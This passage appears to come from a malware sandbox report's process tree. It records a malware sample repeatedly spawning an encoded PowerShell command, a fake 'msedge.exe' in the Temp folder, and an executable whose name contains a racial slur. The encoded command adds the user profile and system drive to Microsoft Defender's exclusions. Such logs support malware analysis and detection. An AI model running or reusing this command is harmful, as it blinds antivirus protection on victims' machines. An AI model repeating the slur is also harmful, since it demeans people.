        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        245⤵
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        245⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        245⤵
        
        PID:1488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        246⤵
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        246⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        246⤵
        
        PID:1008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        247⤵
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        247⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        247⤵
        
        PID:1688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        248⤵
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        248⤵
        
        PID:3316
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        248⤵
        
        PID:476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        249⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        249⤵
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        249⤵
        
        PID:316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        250⤵
        
        PID:3524
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        250⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        250⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        251⤵
        
        PID:3764
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        251⤵
        
        PID:3836
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        251⤵
        
        PID:3620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        252⤵
        
        PID:448
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        252⤵
        
        PID:3880
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        252⤵
        
        PID:3384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        253⤵
        
        PID:3252
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        253⤵
        
        PID:788
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        253⤵
        
        PID:968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        254⤵
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        254⤵
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        254⤵
        
        PID:1224
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        255⤵
        
        PID:3840
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        255⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        255⤵
        
        PID:1196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        256⤵
        
        PID:3396
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        256⤵
        
        PID:3956
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        256⤵
        
        PID:860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        257⤵
        
        PID:3656
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        257⤵
        
        PID:4000
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        257⤵
        
        PID:592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        258⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        258⤵
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        258⤵
        
        PID:3256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        259⤵
        
        PID:1136
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        259⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        259⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        260⤵
        
        PID:4068
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        260⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        260⤵
        
        PID:3376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        261⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        261⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        261⤵
        
        PID:3644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        262⤵
        
        PID:1020
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        262⤵
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        262⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        263⤵
        
        PID:3076
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        263⤵
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        263⤵
        
        PID:316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        264⤵
        
        PID:1936
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        264⤵
        
        PID:1228
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        264⤵
        
        PID:2492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        265⤵
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        265⤵
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        265⤵
        
        PID:1628
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        266⤵
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        266⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        266⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        267⤵
        
        PID:1304
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        267⤵
        
        PID:804
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        267⤵
        
        PID:3588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        268⤵
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        268⤵
        
        PID:3324
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        268⤵
        
        PID:3868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        269⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        269⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        269⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        270⤵
        
        PID:3612
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        270⤵
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        270⤵
        
        PID:4044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        271⤵
        
        PID:3304
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        271⤵
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        271⤵
        
        PID:4040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        272⤵
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        272⤵
        
        PID:3992
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        272⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
